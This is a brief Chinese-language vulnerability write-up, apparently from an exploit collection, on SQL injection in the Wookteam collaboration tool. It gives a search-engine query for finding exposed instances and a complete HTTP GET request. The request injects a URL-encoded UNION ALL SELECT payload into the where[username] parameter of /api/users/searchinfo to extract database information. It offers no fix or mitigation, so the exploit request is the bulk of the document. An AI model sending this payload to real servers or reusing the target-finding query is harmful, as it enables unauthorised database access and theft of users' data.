1 漏洞名称
Wookteam团队在线协作工具SQL注入2 漏洞介绍
Wookteam团队在线协作工具SQL注入存在SQL注入攻击者可通过此漏洞获取数据库信息。3 影响范围
Wookteam团队在线协作工具4 网络空间测绘查询
title="Wookteam"5 漏洞复现
pocGET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close